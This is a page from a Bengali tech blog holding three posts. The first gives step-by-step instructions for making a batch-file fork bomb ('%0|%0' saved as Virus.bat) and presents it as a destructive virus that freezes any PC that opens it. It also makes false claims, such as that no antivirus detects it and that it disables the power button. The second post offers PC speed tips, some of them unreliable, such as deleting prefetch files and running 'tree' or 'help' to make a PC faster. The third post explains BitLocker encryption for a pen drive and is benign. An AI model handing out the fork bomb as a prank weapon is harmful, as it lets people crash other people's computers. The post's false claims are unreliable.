সহজ পাঠ প্রযুক্তির অ,আ,ক,খ

এন্ড্রয়েড,ফ্রীল্যান্সিং,হ্যাকিং,অনলাইনে আয়,পিসি টিপ্‌স ও ট্রিকস্‌,ইবুক,সফটওয়্যার,ডাউনলোড,গেমিং

Click here to contiue

LightBlog
Responsive Ads Here
পিসি টিপ্‌স ও ট্রিকস্‌ লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান
পিসি টিপ্‌স ও ট্রিকস্‌ লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান

মঙ্গলবার, ৪ জুলাই, ২০১৭



সহজ পাঠে আপনাকে আন্তরিক স্বাগতম। আশা করি সকলে ভালো আছেন। আজকে, আপনাদের কে এমন এক ধ্বংসাত্মক ভাইরাস তৈরী করার, ট্রিকস্‌ শেখাব যার সাহায্যে আপনি যেকোন পিসি কে, অভ্যন্তরীন ভাবে সম্পূর্ণ বিপর্যস্ত করে দিয়ে পঙ্গু করে তুলতে পারবেন। তবে দয়া করে এই ট্রিকস্‌ টির সাহায্যে কারোর ক্ষতি করবেন না। আপনার যদি কারোর কোন ক্ষতি করার মনোভাব থাকে তবে, এই পোষ্ট থেকে দূরে থাকুন। কারণ এই ট্রিকস্‌ টি, যেকোন পিসির পক্ষে সত্যই খুব ক্ষতিকর।
এই ভাইরাস তৈরী করার ট্রিকস্‌ টি আপনাদের শেখাচ্ছি তার কারণ হলো আপনি ভবিষ্যতে যাতে এই ধরনের বিপদে না পড়েন। চলুন শুরু করা যাক।

ধ্বংসাত্মক একটি ভাইরাস তৈরী করে, যেকোন পিসি কে অভ্যন্তরীন ভাবে বিপর্যস্ত করে তোলার পিসি ট্রিকস্‌



স্টেপ ১ - আপনি প্রথমে আপনার পিসি থেকে নোটপ্যাড  চালু করুন।


ধ্বংসাত্মক একটি ভাইরাস তৈরী করে, যেকোন পিসি কে অভ্যন্তরীন ভাবে বিপর্যস্ত করে তোলার পিসি ট্রিকস্‌



স্টেপ ২ - নোটপ্যাডে এই কোডটি লিখুন। কোড - (%0|%0)


ধ্বংসাত্মক একটি ভাইরাস তৈরী করে, যেকোন পিসি কে অভ্যন্তরীন ভাবে বিপর্যস্ত করে তোলার পিসি ট্রিকস্‌



স্টেপ ৩ - এরপর সেভ অপশনে গিয়ে, ফাইলের নাম Virus.bat লিখে সেভ করুন।


ধ্বংসাত্মক একটি ভাইরাস তৈরী করে, যেকোন পিসি কে অভ্যন্তরীন ভাবে বিপর্যস্ত করে তোলার পিসি ট্রিকস্‌



স্টেপ ৪ – ব্যাস তৈরী হয়ে গেলো আপনার ধ্বংসাত্মক ভাইরাস।

ধ্বংসাত্মক একটি ভাইরাস তৈরী করে, যেকোন পিসি কে অভ্যন্তরীন ভাবে বিপর্যস্ত করে তোলার পিসি ট্রিকস্‌



এই বার এই ফাইলের উপর ডবল ক্লিক করলেই গোটা পিসি হ্যাং হয়ে যাবে। কি বোর্ড এর কোন কী, বা মাউস কাজ করবে না। এক কথায় পিসি অভ্যন্তরীন ভাবে সম্পূর্ণ, বিপর্যস্ত হয়ে পড়বে এই অবস্থাকে পিসির পঙ্গুত্বও বলতে পারেন। যে ব্যাক্তি তার পিসি তে একবার আপনার তৈরী করা Virus.bat ফাইলটি ভুল করেও ডবল ক্লিক করে খুলে ফেলবে তার আর দুর্দশার সীমা পরিসীমা থাকবেনা। আরও দুঃখের কথা হলো, যে পিসি তে এই Virus.bat ফাইল টি খোলা হলে সেই পিসির সিপিউ-এর বটন ও আর কাজ করবে না।


আর একটি গুরুত্বপূর্ণ কথা হলো যে এই ভাইরাসটিকে ডিটেক্ট করবে এমন কোন অ্যান্টিভাইরাস এখনো তৈরী হয়নি।


আশা করি, আপনি এই পোষ্টটি পড়ার পর এই ভাইরাস যে কিরকম ধ্বংসাত্মক এবং মারাত্মক তা আপনি বুঝতে পেরেছেন। ভুল করেও নিজের পিসি তে ভাইরাসটি ওপেন করবেন না তাহলে, কিন্তু আপনারও দুর্দশার সীমা পরিসীমা থাকবেনা।

কেমন লাগছে সহজ পাঠ ব্লগ, আপনার মতামত, মন্তব্যের মাধ্যমে জানিয়ে যাবেন। 

আপনার মূল্যবান মতামত ব্লগের সৌন্দর্য ও উপযোগীতা বৃদ্ধির প্রধান সহায়ক।

সহজ পাঠের, সকল পোষ্টের আপডেট, নিজের সমস্যা জানানো এবং আরও অনেক কিছু সুবিধা পাওয়ার জন্য সহজ পাঠের ফেসবুক পেজে লাইক দিয়ে যুক্ত হন। আমাদের ফেসবুক পেজ

পোষ্টটি ভালো লাগলে ফেসবুকে ফ্রেন্ডসদের জন্য শেয়ার করতে পারেন।

আজকে এই পর্যন্তই আবার দেখা হবে পরের পোষ্টে।


পোষ্টটি পড়ার জন্য অনেক ধন্যবাদ, ভালো থাকবেন।




বৃহস্পতিবার, ২৯ জুন, ২০১৭



সহজ পাঠে আপনাকে আন্তরিক স্বাগতম। আশাকরি সকলে ভালো আছেন।পোষ্টের টাইটেল দেখেই আপনি হয়ত বুঝে ফেলেছেন আজকে কী বিষয় নিয়ে আলোচনা করা হবে। আজকে আমরা আমাদের পিসি (Personal Computer)-কে গতিশীল করে তোলার কিছু টিপ্‌স ও ট্রিকস্‌ দেখব। চলুন শুরু করা যাক।
পিসি কে গতিশীল করে তোলার কিছু টিপ্‌স ও ট্রিকস্‌


আমরা সকলেই নিজেদের পিসি কে গতিশীল রাখার চেষ্টা করি। কিন্তু যতই আমাদের পিসি র বয়স বাড়তে থাকে ততই আমদের পিসি র গতিশীলতা কমতে থাকে। সময়ের সাথে, সাথে আমাদের পিসি তে কাজ করা প্রায় অসম্ভব হয়ে পড়ে। মূলত ব্যবহারকারীর কিছু কুঅভ্যাসের জন্যই পিসি র গতিশীলতা কমে আসতে থাকে। তাই নিজের পিসি র গতিশীলতা বাড়িয়ে নিন এই টিপ্‌স ও ট্রিকস্‌ গুলির সাহায্যে।

 এক নজরে দেখে নিন এই পোষ্টে কী কী আছে

১। সফটওয়্যার ইন্সটল সম্বন্ধে সতর্কীকরণ
২। Disk Defragment Disk Cleanup এর ব্যবহার
৩। টেম্পোরারি ফাইল ডিলিট
৪। কিছু Run Command এর ব্যবহার

পিসি র গতিশীলতা কমে যাওয়ার অন্যতম কারণ হল অকারণে সফটওয়্যার ইন্সটল করা। সময়ের সঙ্গে, সঙ্গে প্রায় সব ব্যবহারকারীই, পিসি তে কাজের, অকাজের নানান সফটওয়্যার ইন্সটল করে থাকে। এই সফটওয়্যার ইন্সটল এর অভ্যাস আমাদের পিসি র গতিশীলতা অনেক কমিয়ে ফেলে। পরে সফটওয়্যারগুলি আনইন্সটল করে দিলেও লেফটওভার ট্রেস থেকেই যায়। তাই প্রথমেই অকারণে সফটওয়্যার ইন্সটল থেকে বিরত থাকুন। যদি একান্তই নিজেকে সফটওয়্যার ইন্সটল থেকে বিরত না রাখতে পারেন তবে ভালো মানের আনইন্সটলার সফটওয়্যার ব্যবহার করুন। এক্ষেত্রে আমি Revo Uninstaller Pro সাজেস্ট করি।


আমাদের উইন্ডোজ পিসি তেই দুইটি ভালো টুল আছে যাদের সাহায্যে আমারা আমদের পিসি কে গতিশীল করে তুলতে পারি। এই দুটি টুলের কথা আমরা অনেকেই জানিনা। টুল দুটি হলো
১। Defragment and Optimize Drives  এবং ২। Disk Cleanup
                   
                      ১। Defragment and Optimize Drives –  এই টুলটিল সাহায্যে আমরা ফ্রাগমেন্ট হয়ে যাওয়ে ডিস্ক ড্রাইভ গুলিকে ডীফ্রাগ করে নিতে পারব। ড্রাইভ গুলি মূলত বিভিন্ন ফাইল কপি এবং পেস্ট করার জন্য ফ্রাগমেন্টেড হয়ে যায়। ফ্রাগমেন্ট হয়ে যাওয়ার ফলে আমদের পিসি র গতিশীলতা প্রভূত পরিমাণে কমে যায়। নিয়মিত ডিস্ক ড্রাইভ ডিফ্রাগ করলে পিসি র গতিশীলতা অনেক বেড়ে যাবে। এই টুলটি ব্যবহার করবার জন্য Start Menu থেকে Defragment and Optimize Drives  সার্চ করে চালু করুন। হার্ড ডিস্ক এর প্রত্যেক পার্টিশন কে অ্যানালাইজ করুন, আপনার ড্রাইভ কত শতাংশ ফ্রাগমেন্ট হয়ে আছে তা আপনি দেখতে পারবেন। এইবার Optimize ক্লিক করলে আপনার ড্রাইভগুলি ডিফ্রাগ হয়ে যাবে। বুঝতে না পারলে নীচের চিত্র দেখুন।

পিসি কে গতিশীল করে তোলার কিছু টিপ্‌স ও ট্রিকস্‌

                         
                       ২। Disk Cleanupএই টুলটি আপনার হার্ড ড্রাইভে থাকা অপ্রয়োজনীয় ফাইলগুলিকে ডিলিট করে দেয়। অপ্রয়োজনীয় ফাইল বলতে বিভিন্ন লেফটওভ্যার ট্রেস, থাম্বনেইল ,Temp এই ফাইল গুলিকেই বোঝায়। এই টুল ব্যবহার করলে আপনার সংরক্ষিত ফাইলগুলির যেমন – ডকুমেন্ট, অডিও, মুভি এই ফাইলগুলির কোন ক্ষতি হবে না। হার্ড ড্রাইভে এই অপ্রয়োজনীয় ফাইলগুলি না থাকলে পিসি অনেক গতিশীল হয়ে উঠবে। এই টুলটি ব্যবহার করবার জন্য  Start Menu থেকে  Disk Cleanup সার্চ করুন এবং চালু করুন। Disk Cleanup চালু করবার পর, আপনার ড্রাইভের পার্টিশনগুলি দেখতে পাবেন। প্রত্যেকটি পার্টিশন আলাদা করে স্ক্যান করুন এবং ফাইলগুলি ডিলিট করুন। এই টুলটির ব্যবহারে আপনার পিসি অনেক গতিশীল হয়ে উঠবে। বুঝতে না পারলে নীচের চিত্র দেখুন।

পিসি কে গতিশীল করে তোলার কিছু টিপ্‌স ও ট্রিকস্‌




এরপর দেখে নেব, টেম্পোরারি ফাইলগুলি কী করে ডিলিট করতে হয় ? পিসি তে কাজ চলবার সময় পিসি নিজের সুবিধার্থে স্বয়ংক্রিয় ভাবে কিছু ফাইল তৈরী করে থাকে। এই ফাইলগুলিকে সাময়িক ফাইল বা Temporary ফাইল বলা হয়। এই ফাইলগুলি অতি অল্প সময়ের জন্যই পিসি র কাজে লাগে। কাজ শেষ হয়ে যাবার ফাইলগুলি আমাদের পিসি তে থেকে যায় এবং পিসি র গতিশীলতাকে কমিয়ে ফেলে। তাই এই ফাইলগুলি নিয়মিত ডিলিট করে দিতে হয়। আসুন দেখে নিই কীভাবে ফাইলগুলি ডিলিট করবেন।
               
                ১ -->কি-বোর্ড থেকে win+R প্রেস করুন
               ২-->Run উইন্ডো তে temp লিখে, Enter প্রেস করুন
              ৩-->যে ফাইল গুলি দেখতে পাবেন সেইগুলি ctrl+A প্রেস করে সিলেক্ট করুন
               ৪-->এরপর Shift+Delete প্রেস করুন
              ৫-->যে ফাইলগুলি ডিলিট হবে না সেইগুলি ছেড়ে দিন

উপরে দেওয়া পদ্ধতি দিয়ে একই ভাবে আরও তিন বার ফাইল ডিলিট করুন। শুধুমাত্র ২ নং স্টেপ এ temp এর পরিবর্তে প্রথমবার %tmp% বসান, দ্বিতীয় বার prefetch বসান এবং তৃতীয়বার recent বসান। ফাইলগুলি ডিলিট করবার প্র হার্ড ড্রাইভ অনেক ফাঁকা হয়ে উঠবে এবং পিসি অনেক গতিশীল হয়ে উঠবে।বুঝতে না পারলে নীচের চিত্র দেখুন।

পিসি কে গতিশীল করে তোলার কিছু টিপ্‌স ও ট্রিকস্‌






এইবার বলব কিছু Run Command এর কথা যেইগুলি ব্যবহার করলে আপনার পিসি অনেক গতিশীল হয়ে উঠবে। চলুন দেখে নেওয়া যাক কিভাবে এর ব্যবহার করবেন।
                                
                                ১ -->কি-বোর্ড থেকে win+R প্রেস করুন
                               ২-->Run উইন্ডো তে help লিখে, Enter প্রেস করুন

উপরে দেওয়া পদ্ধতিটি আরও তিনবার ব্যবহার করুন। শুধুমাত্র ২ নং পদ্ধতির help এর পরিবর্তে প্রথমবার লিখুন sfc , দ্বিতীয়বার লিখুন tree , এবং তৃতীয়বারে লিখুন tree.com বুঝতে না পারলে নীচের চিত্র দেখুন।

পিসি কে গতিশীল করে তোলার কিছু টিপ্‌স ও ট্রিকস্‌


এবার নিজের পিসি ব্যবহার করে দেখুন আগের থেকে অনেক গতিশীল হয়ে উঠেছে। এই টিপ্‌স ও ট্রিক্‌স গুলি নিয়মিত ব্যবহার করলে আপনার পিসি গতিশীল থাকবে।

পরিশেষে বলব এই ট্রিক্‌স গুলি ব্যবহার করলে আপনার পিসি র কোন ক্ষতি হবে না। আপনি নিশ্চিন্তে এই ট্রিক্‌স গুলি ব্যবহার করতে পারবেন।

কোথাও কোন অসুবিধা মন্তব্য করে জানাবেন। কেমন লাগলো সেই মতামতটাও একটু 
সময় করে দিয়ে যাবেন।

আপনার মূল্যবান মতামত ব্লগের সৌন্দর্য ও উপযোগীতা বৃদ্ধির প্রধান সহায়ক।

ভালো লাগলে পোষ্টটি ফেসবুকে শেয়ার করুন।

পোষ্টটি পড়ার জন্য অনেক ধন্যবাদ। ভালো থাকবেন।




শনিবার, ৩ জুন, ২০১৭


খুব সহজেই পাসওয়ার্ড দিয়ে আপনার পেনড্রাইভকে সুরক্ষিত করুন


ব্লগের দুনিয়ায় নতুন পা রাখা আমার এই ব্লগে আপনাকে স্বাগতম। প্রযুক্তিতে সারা পৃথিবী অনেক এগিয়ে গেছে, নানান প্রযুক্তি বিষয়ক ব্লগও তৈরী হয়েছে। কিন্তু ভারতে বাংলা ব্লগের সংখ্যা হাতেগোনা। তাই প্রযুক্তিকে সবার কাছে সহজ ভাবে পৌঁছে দিতে আমার এই ক্ষুদ্র প্রচেষ্টা।
ডিজিটাল দুনিয়ায় সমস্ত ফাইল অর্থাৎ মুভি,ভিডিও,অডিও,গেমস,পিকচার ইত্যাদি পরিবহনের জন্য পেনড্রাইভ সবার কাছে জনপ্রিয় এক হার্ডওয়্যার। এটি ক্ষুদ্র কিন্তু অনেক বেশী ক্ষমতাসম্পন্ন তাই অত্যন্ত জনপ্রিয়।
পেনড্রাইভ ব্যবহারে একটাই সমস্যা এটি হারিয়ে গেলে এর মধ্যে থাকা, কনফিডেনশিয়াল ডকুমেন্ট গুলি খারাপ হাতে পরতে পারে। তাই আসুন জেনে নিই নিজের পেনড্রাইভে কি করে পাসওয়ার্ড ব্যবহার করে এটি সুরক্ষিত রাখবেন।
আপনার উইন্ডোজ পিসি র মাধ্যমে আপনি খুব সহজেই আপনার পেনড্রাইভে পাসওয়ার্ড এড করতে পারবেন।
পেনড্রাইভে পাসওয়ার্ড এড করতে নীচে দেওয়া পদ্ধতি অনুসরণ করুন।
ü  প্রথমে আপনার পিসির সঙ্গে আপনার পেনড্রাইভের সংযোগ করুন



ü  কন্ট্রোল প্যানেলে গিয়ে  Bit locker Drive encryption অপশনটি সিলেক্ট করুন
               আপনার পেনড্রাইভের আইকনের পাশে Turn on Bit locker এ ক্লিক করুন
 


ü  বিট লকার এনস্ক্রিপশনের সময় পেনড্রাইভ নিজের পিসি র থেকে বিছিন্ন করবেন না।
ü  Use a password চেকবক্সে ক্লিক করে নতুন পাসওয়ার্ড দিন এবং কনফার্ম করে নেক্সট বটনে ক্লিক করুন


ü  রিকভারি কি অর্থাৎ, পাসওয়ার্ড ভুলে গেলে যা দিয়ে আপনি আপনার পেনড্রাইভকে পুনরায় আনলক করতে পারবেন তা একটি ফাইল হিসাবে সেভ করুন। নেক্সট বটনে ক্লিক করুন

 
তারপর আরও দুইবার নেক্সট বটনে ক্লিক করুন এবং বিট লকার এনস্ক্রিপশন শুরু হয়ে যাবে। এনস্ক্রিপশন চলাকালীন পেনড্রাইভকে আপনার পিসি থেকে বিছিন্ন করবেন না

ü   

এনস্ক্রিপশন সম্পূর্ণ হতে একটু বেশী সময় লাগতে পারে। অপেক্ষা করুন। এনস্ক্রিপশন সম্পূর্ণ হলে পেনড্রাইভকে পিসি থেকে বিছিন্ন করে পুনরায় সংযুক্ত করুন। দেখুন পাসওয়ার্ড চাইবে

তাহলে আমরা আমাদের পেনড্রাইভকে সুরক্ষিত করলাম।
আজ এই পর্যন্তই আবার দেখা হবে পরের পোষ্টে।
অসুবিধা হলে কমেন্ট করতে ভুলবেন না
ব্লগ সম্মন্ধে আপনাদের সুচিন্তিত মতামত সাদরে গৃহীত হবে।
পোষ্টটি পড়ার জন্য ধন্যবাদ।